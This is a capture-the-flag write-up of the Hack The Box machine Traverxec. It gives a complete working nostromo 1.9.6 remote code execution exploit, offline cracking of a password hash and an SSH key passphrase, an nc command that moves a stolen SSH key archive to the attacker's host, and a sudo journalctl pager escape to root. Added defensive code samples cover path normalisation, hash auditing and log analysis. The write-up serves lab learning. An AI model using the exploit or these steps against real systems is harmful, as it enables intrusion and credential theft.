HTB Linux Traverxec

Overview
Initial access comes through the Nostromo web server; understanding what the Nostromo configuration file means leads to a shell as david, followed by privilege escalation through sudo. The hard part of this box is understanding and using the Nostromo configuration file; without prior knowledge of Nostromo this can easily become the most time-consuming step. Also, English really matters; I need to work on it.

Information gathering

1. Port scan

# Nmap 7.70 scan initiated Sat Jan 11 17:13:53 2020 as: nmap -sC -sV -p22,80 --script=vuln -oA scan/Traverxec-vuln 10.10.10.165
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for localhost (10.10.10.165)
Host is up (0.27s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nostromo 1.9.6
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=localhost
| Found the following possible CSRF vulnerabilities:
|
| Path: http://localhost:80/
| Form id: contact-name
|_ Form action: empty.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: nostromo 1.9.6
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: OSVDB:74721 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| http://osvdb.org/74721
| http://seclists.org/fulldisclosure/2011/Aug/175
| http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_ http://nessus.org/plugins/index.php?view=single&id=55976
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 11 17:24:08 2020 -- 1 IP address (1 host up) scanned in 615.20 seconds

Port 22: SSH, OpenSSH 7.9p1 Debian 10+deb10u1

Port 80: HTTP, nostromo 1.9.6

2. Look up known vulnerabilities for the web server version

$ searchsploit nostromo 1.9
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
Exploit Title | Path
| (/usr/local/opt/exploitdb/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
nostromo 1.9.6 - Remote Code Execution | exploits/multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution | exploits/linux/remote/35466.sh
--------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
Shellcodes: No Result
Papers: No Result

OpenSSH 7.9 offers nothing useful here, so go straight to nostromo. nostromo is an open-source web server; RCE was disclosed for versions 1.9.3 and 1.9.6 (CVE-2019-16278 for 1.9.6, published in 2019), so it is worth trying.

nostromo RCE

Use 47837.py. The exploit was written for Python 2; in Python 3 the data sent and received on a socket must be bytes rather than str, so the original exploit's sent data is encode()d and the received data decode()d, as below:

# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278


#!/usr/bin/env python3

import sys
import socket

art = """

_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/



"""

help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'

def connect(soc):
    # Read until the server closes the connection; received bytes are decoded to str (Python 3)
    response = ""
    try:
        while True:
            connection = soc.recv(1024)
            if len(connection) == 0:
                break
            response += connection.decode()
    except:
        pass
    return response

def cve(target, port, cmd):
    soc = socket.socket()
    soc.connect((target, int(port)))
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
    soc.send(payload.encode())  # str must be encoded to bytes before sending (Python 3)
    receive = connect(soc)
    ans = receive.split('\r\n\r\n\r\n')[1]
    print(ans)

if __name__ == "__main__":
    print(art)
    try:
        target = sys.argv[1]
        port = sys.argv[2]
        while 1:
            cmd = input('owef > ')
            if cmd in ['exit', 'quit']:
                break
            cve(target, port, cmd)

    except IndexError:
        print(help_menu)
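Why the request line above slips past a naive filter: the encoded carriage return (%0d) sits inside every `..`, so the raw path never contains the literal `/../`. The following is an added example, not part of the original post nor of nostromo's code, that contrasts such a substring check with a normaliser that decodes first, refuses control characters and rejects any parent-directory segment. The function names are mine; the sample request path is copied from the payload above.

```python
from urllib.parse import unquote

# Request path copied from the exploit above (used here as the sample input).
TRAVERSAL_REQUEST = "/.%0d./.%0d./.%0d./.%0d./bin/sh"


def naive_is_safe(raw_path: str) -> bool:
    """A substring check on the raw, still-encoded path.

    This is the kind of check the %0d trick slips past: the raw string has a
    carriage return between the dots, so '/../' is never seen.
    """
    return "/../" not in raw_path and not raw_path.startswith("../")


def normalize_request_path(raw_path: str):
    """Decode, validate and normalise a request path.

    Returns the canonical path (relative to the document root, always
    starting with '/') or None when the request must be rejected.
    """
    decoded = unquote(raw_path)

    # 1. Control characters (CR, LF, NUL, ...) have no place in a path. Rejecting
    #    them here means nothing later in the pipeline can strip them away and
    #    thereby create a '..' that the traversal check never saw.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
        return None

    # 2. Only absolute paths are meaningful as an HTTP request target.
    if not decoded.startswith("/"):
        return None

    # 3. Walk the segments after decoding: '.' and empty segments collapse,
    #    '..' is refused outright instead of being resolved.
    parts = []
    for segment in decoded.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            return None
        parts.append(segment)
    return "/" + "/".join(parts)


if __name__ == "__main__":
    print("naive check accepts traversal:", naive_is_safe(TRAVERSAL_REQUEST))
    print("hardened check result:", normalize_request_path(TRAVERSAL_REQUEST))
```

The order matters: decode, then reject control characters, then inspect segments. Any design that checks the raw string first and sanitises afterwards reopens exactly the gap this exploit uses.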

With a shell, start collecting information about the machine:

  • Users: david, root
  • OS and kernel: Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux
  • Web server configuration: /var/nostromo/conf/nhttpd.conf and /var/nostromo/conf/.htpasswd; found a Cisco IOS style password hash (marker: $1$)
  • sudoers: sudo -l asks for a password, not usable
  • Readable or writable files under /home and /root: find /home -perm -004 2>/dev/null finds nothing

Listing the configuration directory and reading nhttpd.conf and /var/nostromo/conf/.htpasswd:

owef > ls /var/nostromo
conf
htdocs
icons
logs

owef > ls /var/nostromo/conf
mimes
nhttpd.conf

owef > ls /var/nostromo/conf/nhttpd.conf
/var/nostromo/conf/nhttpd.conf

owef > cat /var/nostromo/conf/nhttpd.conf
# MAIN [MANDATORY]

servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html

# LOGS [OPTIONAL]

logpid logs/nhttpd.pid

# SETUID [RECOMMENDED]

user www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs /home
homedirs_public public_www


owef > cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

Cracking the Cisco-IOS $1$ (MD5) hash

Cisco-IOS MD5 passwords are recognised by the $1$ prefix, the md5crypt scheme that hashcat handles as mode 500 (md5crypt / MD5 (Unix) / Cisco-IOS $1$), so crack it offline with hashcat:

# write the hash to a file (single quotes, otherwise the shell expands $1, $e7NfNpNi and $A6nCwOTqrNR2oDuIKirRZ)
$ echo '$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/' > david.hash
# crack
$ hashcat -m 500 -a 0 -d 2 david.hash ../../../tools/Passwd_Attack/wordlists/rockyou.txt
# show
$ hashcat -m 500 -a 0 -d 2 david.hash ../../../tools/Passwd_Attack/wordlists/rockyou.txt --show
$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me
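A defender reading the .htpasswd above wants two things: to confirm which scheme the $1$ prefix is, and to see why a wordlist recovers it in seconds. The following added example (my code, not the page's or nostromo's) implements md5crypt in plain Python from the published FreeBSD algorithm, verifies a candidate password against the entry shown above in constant time, and audits an .htpasswd file for schemes that are cheap to brute-force. The only input is the single entry copied from the page; the function names are mine.

```python
import hashlib
import hmac

# .htpasswd line copied from the box above; the candidate password is the
# one hashcat recovered.
HTPASSWD_SAMPLE = "david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/\n"

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    # crypt(3)'s little-endian base64 variant, 6 bits per character
    out = ""
    for _ in range(count):
        out += _ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password: str, salt: str) -> str:
    """The classic crypt(3) '$1$' scheme: 1000 MD5 rounds over an 8-char salt.

    Pure-Python transcription of the FreeBSD algorithm, written for this
    example; no third-party library is needed.
    """
    pw = password.encode()
    salt_b = salt.encode()[:8]
    ctx = hashlib.md5(pw + b"$1$" + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[: min(16, remaining)])
        remaining -= 16
    bits = len(pw)
    while bits:  # one byte per bit of the password length
        ctx.update(b"\x00" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()
    for i in range(1000):  # the deliberate slowdown, tiny by modern standards
        rnd = hashlib.md5()
        rnd.update(pw if i & 1 else final)
        if i % 3:
            rnd.update(salt_b)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()
    encoded = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    encoded += _to64(final[11], 2)
    return "$1$" + salt_b.decode() + "$" + encoded


def verify_md5crypt(stored: str, candidate: str) -> bool:
    """Constant-time comparison of a candidate against a '$1$salt$hash' entry."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[1] != "1":
        return False
    return hmac.compare_digest(md5crypt(candidate, parts[2]), stored)


def audit_htpasswd(text: str):
    """Return (user, note) pairs for entries whose scheme is cheap to brute-force."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        if digest.startswith("$1$"):
            findings.append((user, "md5crypt ($1$): 1000 MD5 rounds, GPU-crackable at scale"))
        elif digest.startswith("$apr1$"):
            findings.append((user, "apr1: Apache MD5 variant, same weakness as $1$"))
        elif digest.startswith("{SHA}"):
            findings.append((user, "unsalted SHA-1"))
        elif not digest.startswith(("$2", "$5$", "$6$")):
            findings.append((user, "unrecognised or DES-crypt hash"))
    return findings


if __name__ == "__main__":
    entry = HTPASSWD_SAMPLE.split(":", 1)[1].strip()
    print("Nowonly4me matches:", verify_md5crypt(entry, "Nowonly4me"))
    print("audit:", audit_htpasswd(HTPASSWD_SAMPLE))
```

md5crypt's 1000 MD5 rounds are why a rockyou run finishes almost instantly; an .htpasswd file that guards anything sensitive should use bcrypt (htpasswd -B), and the audit function treats only $2, $5$ and $6$ entries as acceptable.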

With the password in hand, an SSH login was tried and failed. A rabbit hole? Continued collecting other information without result. Later, on a friend's hint, I went back to /var/nostromo/conf/nhttpd.conf and checked the official documentation: when the homedirs option is configured, the contents of home directories can be reached over the web as "~username", for example "http://10.10.10.165/~david/".

Visiting it only shows: Private space. Nothing here. Keep out! So I started enumerating directories with gobuster, but none of the many wordlists found anything; reading david's directory directly from the shell was also denied. Back to the configuration documentation, which contains one important sentence: "You can restrict the access within the home directories to a single sub directory by defining it via the homedirs_public option." In other words, to expose only one directory, it is named with the homedirs_public parameter as /home/<user>/<public_dir>; so when that parameter names a directory, that directory must also exist under /home.

If only homedirs is set, every folder and file under the homedirs path is reachable over the web, but

Information gathering

ls /var/nostromo
ls /var/nostromo/conf

cat /var/nostromo/conf/nhttpd.conf

cat /var/nostromo/conf/.htpasswd

find / -name "*.tgz"

Reading the configuration file carefully gave a new lead (thanks to Saker for the tip, and to Google Translate)

config
Key parts of the configuration documentation:

HOMEDIRS
To serve the home directories of your users via HTTP, enable the homedirs option by defining the path in where the home directories are stored, normally /home. To access a users home directory enter a ~ in the URL followed by the home directory name like in this example:
http://www.nazgul.ch/~hacki/
The content of the home directory is handled exactly the same way as a directory in your document root. If some users don't want that their home directory can be accessed via HTTP, they shall remove the world readable flag on their home directory and a caller will receive a 403 Forbidden response. Also, if basic authentication is enabled, a user can create an .htaccess file in his home directory and a caller will need to authenticate.
You can restrict the access within the home directories to a single sub directory by defining it via the homedirs_public option.
  • If homedirs is configured, a user's home directory can be reached with ~ followed by the home directory name, e.g. http://10.10.10.165/~david/; files under a home directory are handled the same way as files under the document root
  • If a user does not want their home directory reachable over HTTP, they can remove the world-readable flag; web access then gets a 403 response
  • If a user creates an .htaccess file in their home directory, callers will have to authenticate
  • If homedirs_public is set, only that subdirectory of the home directory is reachable: a request for http://10.10.10.165/~david/ actually serves "/home/david/public_www"
  • nostromo runs as the user named by the user option (www-data); if /home/david/public_www can be reached over the web, www-data must have read permission on /home/david/public_www, so it can be read directly from the shell
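To make the HOMEDIRS rules concrete, here is an added example (my own code, not part of the post or of nostromo) that parses the nhttpd.conf directives shown above, maps a request path to the filesystem location those rules imply, and lists what a reviewer of that configuration would flag. It models the documented behaviour rather than nhttpd's source; the config text is copied from the page and the function names are mine.

```python
import posixpath

# Directives copied from the nhttpd.conf shown above (the sample input for this example).
NHTTPD_CONF = """
# MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
docroot /var/nostromo/htdocs
docindex index.html

# SETUID [RECOMMENDED]
user www-data

# BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]
/icons /var/nostromo/icons

# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
"""


def parse_nhttpd_conf(text: str) -> dict:
    """Turn 'key value' lines into a dict; keys starting with '/' are aliases."""
    conf = {"aliases": {}}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0]
        value = parts[1].strip() if len(parts) > 1 else ""
        if key.startswith("/"):
            conf["aliases"][key] = value
        else:
            conf[key] = value
    return conf


def resolve_request(conf: dict, url_path: str) -> str:
    """Map a request path to the filesystem path the HOMEDIRS docs imply.

    '/~user/...' goes to <homedirs>/user[/<homedirs_public>]/...; other paths go
    through aliases or the document root. normpath collapses '..' against '/'
    first, so nothing can resolve above the configured roots.
    """
    clean = posixpath.normpath("/" + url_path.lstrip("/"))
    if clean.startswith("/~") and "homedirs" in conf:
        user, _, rest = clean[2:].partition("/")
        base = posixpath.join(conf["homedirs"], user)
        if conf.get("homedirs_public"):
            base = posixpath.join(base, conf["homedirs_public"])
        return posixpath.join(base, rest) if rest else base
    for prefix, target in conf["aliases"].items():
        if clean == prefix or clean.startswith(prefix + "/"):
            return target + clean[len(prefix):]
    return conf["docroot"] + clean


def audit_nhttpd_conf(conf: dict):
    """Findings a reviewer of this config would raise, as (severity, message) pairs."""
    findings = []
    if "homedirs" in conf:
        scope = conf.get("homedirs_public") or "the whole home directory"
        findings.append(("info", f"homedirs enabled: ~user URLs expose {scope} under {conf['homedirs']}"))
        findings.append(("medium",
                         f"anything in that path readable by '{conf.get('user', 'root')}' is web-reachable"))
    if "user" not in conf:
        findings.append(("high", "no 'user' directive: nhttpd keeps root privileges"))
    if "htpasswd" in conf:
        findings.append(("info", f"basic auth credentials live in {conf['htpasswd']}; check the hash scheme"))
    return findings


if __name__ == "__main__":
    conf = parse_nhttpd_conf(NHTTPD_CONF)
    print(resolve_request(conf, "/~david/"))
    for severity, message in audit_nhttpd_conf(conf):
        print(f"[{severity}] {message}")
```

The point of resolve_request is the one the bullets above make: with homedirs_public set, the ~david URL is a window onto /home/david/public_www, and whatever www-data can read there is also readable from a shell running as www-data.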

From the shell, go into /home/david/public_www: it holds a protected-file-area directory, and inside it backup-ssh-identity-files.tgz.

Transfer it to the local machine with nc:

# kali
$ nc -lvvp 4444 > backup-ssh-identity-files.tgz

# 10.10.10.165
$ nc 10.10.14.151 4444 < backup-ssh-identity-files.tgz

Extract the tgz archive to get david's public and private keys

$ tar xzvf backup-ssh-identity-files.tgz
# Extraction yields a home directory tree holding the contents of /home/david/.ssh/:
$ ls
david
$ cd david/.ssh
$ ls
authorized_keys id_rsa id_rsa.pub

Crack the private key passphrase and log in as david

$ cp ./home/david/.ssh/id_rsa ./
# convert the key to john's format with ssh2john
$ python /usr/share/john/ssh2john.py id_rsa > david.id_rsa.john
# john crack
$ john --format=SSH --wordlist=/usr/share/wordlists/rockyou.txt david.id_rsa.john
# show the recovered passphrase
$ john --show david.id_rsa.john

Got the passphrase of david's private key: ""

user:david

Log in to 10.10.10.165 with id_rsa

ssh david@10.10.10.165 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Wed Jan 15 10:58:44 2020 from 10.10.15.171
david@traverxec:~$ ls -la
total 36
drwx--x--x 5 david david 4096 Oct 25 17:02 .
drwxr-xr-x 3 root root 4096 Oct 25 14:32 ..
lrwxrwxrwx 1 root root 9 Oct 25 16:15 .bash_history -> /dev/null
-rw-r--r-- 1 david david 220 Oct 25 14:32 .bash_logout
-rw-r--r-- 1 david david 3526 Oct 25 14:32 .bashrc
-rw-r--r-- 1 david david 807 Oct 25 14:32 .profile
drwx------ 2 david david 4096 Oct 25 17:02 .ssh
drwx------ 2 david david 4096 Oct 25 16:26 bin
drwxr-xr-x 3 david david 4096 Oct 25 15:45 public_www
-r--r----- 1 root david 33 Oct 25 16:14 user.txt

The home directory contains a bin directory; look at its contents

david@traverxec:~$ cd bin
david@traverxec:~/bin$ ls -la
total 16
drwx------ 2 david david 4096 Oct 25 16:26 .
drwx--x--x 5 david david 4096 Oct 25 17:02 ..
-r-------- 1 david david 802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david 363 Oct 25 16:26 server-stats.sh

View and run server-stats.sh

david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

# run server-stats.sh
david@traverxec:~/bin$ ./server-stats.sh
.----.
.---------. | == |
Webserver Statistics and Data |.-"""""-.| |----|
Collection Script || || | == |
(c) David, 2019 || || |----|
|'-.....-'| |::::|
'"")---(""' |___.|
/:::::::::::\" "
/:::=======:::\
jgs '"""""""""""""'

Load: 11:10:19 up 23 min, 3 users, load average: 0.00, 0.00, 0.00

Open nhttpd sockets: 11
Files in the docroot: 117

Last 5 journal log lines:
-- Logs begin at Wed 2020-01-15 10:47:08 EST, end at Wed 2020-01-15 11:10:19 EST. --
Jan 15 10:59:46 traverxec sudo[956]: pam_unix(sudo:auth): conversation failed
Jan 15 10:59:46 traverxec sudo[956]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Jan 15 10:59:46 traverxec sudo[956]: www-data : user NOT in sudoers ; TTY=pts/3 ; PWD=/usr/bin ; USER=root ; COMMAND=/usr/bin/chown -R www-data
Jan 15 11:03:53 traverxec sudo[1022]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/6 ruser=www-data rhost= user=www-data
Jan 15 11:04:01 traverxec sudo[1022]: www-data : command not allowed ; TTY=pts/6 ; PWD=/home/david ; USER=root ; COMMAND=list

Trying to run journalctl through sudo directly asks for david's password:

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl
[sudo] password for david:
Sorry, try again.
[sudo] password for david:
Sorry, try again.
[sudo] password for david:
sudo: 3 incorrect password attempts

Priv:root

Getting a shell through journalctl

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
-- Logs begin at Wed 2020-01-15 10:47:08 EST, end at Wed 2020-01-15 11:14:57 EST. --
Jan 15 10:59:46 traverxec sudo[956]: pam_unix(sudo:auth): conversation failed
Jan 15 10:59:46 traverxec sudo[956]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Jan 15 10:59:46 traverxec sudo[956]: www-data : user NOT in sudoers ; TTY=pts/3 ; PWD=/usr/bin ; USER=root ; COMMAND=/usr/bin/chown -R www-data
Jan 15 11:03:53 traverxec sudo[1022]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/6 ruser=www-data rhost= user=www-data
Jan 15 11:04:01 traverxec sudo[1022]: www-data : command not allowed ; TTY=pts/6 ; PWD=/home/david ; USER=root ; COMMAND=list
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Wed 2020-01-15 10:47:08 EST, end at Wed 2020-01-15 11:15:10 EST. --
Jan 15 10:59:46 traverxec sudo[956]: pam_unix(sudo:auth): conversation failed
Jan 15 10:59:46 traverxec sudo[956]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Jan 15 10:59:46 traverxec sudo[956]: www-data : user NOT in sudoers ; TTY=pts/3 ; PWD=/usr/bin ; USER=root ;
Jan 15 11:03:53 traverxec sudo[1022]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty
Jan 15 11:04:01 traverxec sudo[1022]: www-data : command not allowed ; TTY=pts/6 ; PWD=/home/david ; USER=roo
!/bin/bash
root@traverxec:/home/david/bin# id
uid=0(root) gid=0(root) groups=0(root)
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls -la
total 64
drwx------ 3 root root 4096 Nov 12 04:00 .
drwxr-xr-x 18 root root 4096 Oct 25 14:17 ..
lrwxrwxrwx 1 root root 9 Oct 25 16:21 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 Nov 12 04:00 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 37520 Oct 25 14:43 nostromo_1.9.6-1.deb
-r-------- 1 root root 33 Oct 25 16:21 root.txt
root@traverxec:~# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906
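The journal lines above are a small sample of what sudo writes on every refused or granted command, and they are worth parsing rather than eyeballing. The following added example (my code, not the page's) extracts structured events from those lines, labels refusals, and flags granted commands such as journalctl that hand a root-owned terminal to a pager; the `| /usr/bin/cat` in server-stats.sh is exactly what keeps the pager out of the loop, and a sudo rule that allows journalctl without it is the weakness. The five failure lines are copied from the page; the final `david` line is constructed to show a granted command, and the list of pager-capable programs is my own.

```python
import re

# Five journal lines copied from the server-stats.sh output above, plus one
# constructed success line (sudo logs granted commands in the same layout).
JOURNAL_SAMPLE = """\
Jan 15 10:59:46 traverxec sudo[956]: pam_unix(sudo:auth): conversation failed
Jan 15 10:59:46 traverxec sudo[956]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Jan 15 10:59:46 traverxec sudo[956]: www-data : user NOT in sudoers ; TTY=pts/3 ; PWD=/usr/bin ; USER=root ; COMMAND=/usr/bin/chown -R www-data
Jan 15 11:03:53 traverxec sudo[1022]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/6 ruser=www-data rhost= user=www-data
Jan 15 11:04:01 traverxec sudo[1022]: www-data : command not allowed ; TTY=pts/6 ; PWD=/home/david ; USER=root ; COMMAND=list
Jan 15 11:20:00 traverxec sudo[1100]: david : TTY=pts/7 ; PWD=/home/david/bin ; USER=root ; COMMAND=/usr/bin/journalctl -n5 -unostromo.service
"""

# sudo's command-event layout: "<user> : [<reason> ; ]TTY=... ; PWD=... ; USER=... ; COMMAND=..."
SUDO_EVENT = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sudo\[(?P<pid>\d+)\]: "
    r"(?P<user>\S+) : (?:(?P<reason>[^;]+?) ; )?TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<target>\S+) ; COMMAND=(?P<command>.*)$"
)

# Programs that open a pager (or are one) when their stdout is a terminal;
# a pager's shell escape then runs with the privileges sudo granted.
PAGER_CAPABLE = ("journalctl", "less", "more", "vi", "vim", "man", "systemctl")


def parse_sudo_events(text: str):
    """Return one dict per sudo command event; pam_unix lines are not command events."""
    events = []
    for line in text.splitlines():
        match = SUDO_EVENT.match(line)
        if match:
            events.append(match.groupdict())
    return events


def classify(events):
    """Tag each event 'denied', 'pager_risk' or 'allowed' as (user, tag, command)."""
    tagged = []
    for event in events:
        words = event["command"].split()
        program = words[0].rsplit("/", 1)[-1] if words else ""
        if event["reason"]:
            tag = "denied"
        elif program in PAGER_CAPABLE:
            tag = "pager_risk"
        else:
            tag = "allowed"
        tagged.append((event["user"], tag, event["command"]))
    return tagged


if __name__ == "__main__":
    for user, tag, command in classify(parse_sudo_events(JOURNAL_SAMPLE)):
        print(f"{tag:<10} {user:<9} {command}")
```

Two refusals from www-data followed by a granted journalctl for david is the shape of this box's escalation path; on a real host the same classifier over `journalctl -u sudo` output (or the auth log) gives an alert-worthy signal without any pattern specific to this machine.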

References

https://www.exploit-db.com/exploits/47837
https://git.sp0re.sh/sp0re/Nhttpd-exploits
https://hashcat.net/forum/thread-4283.html
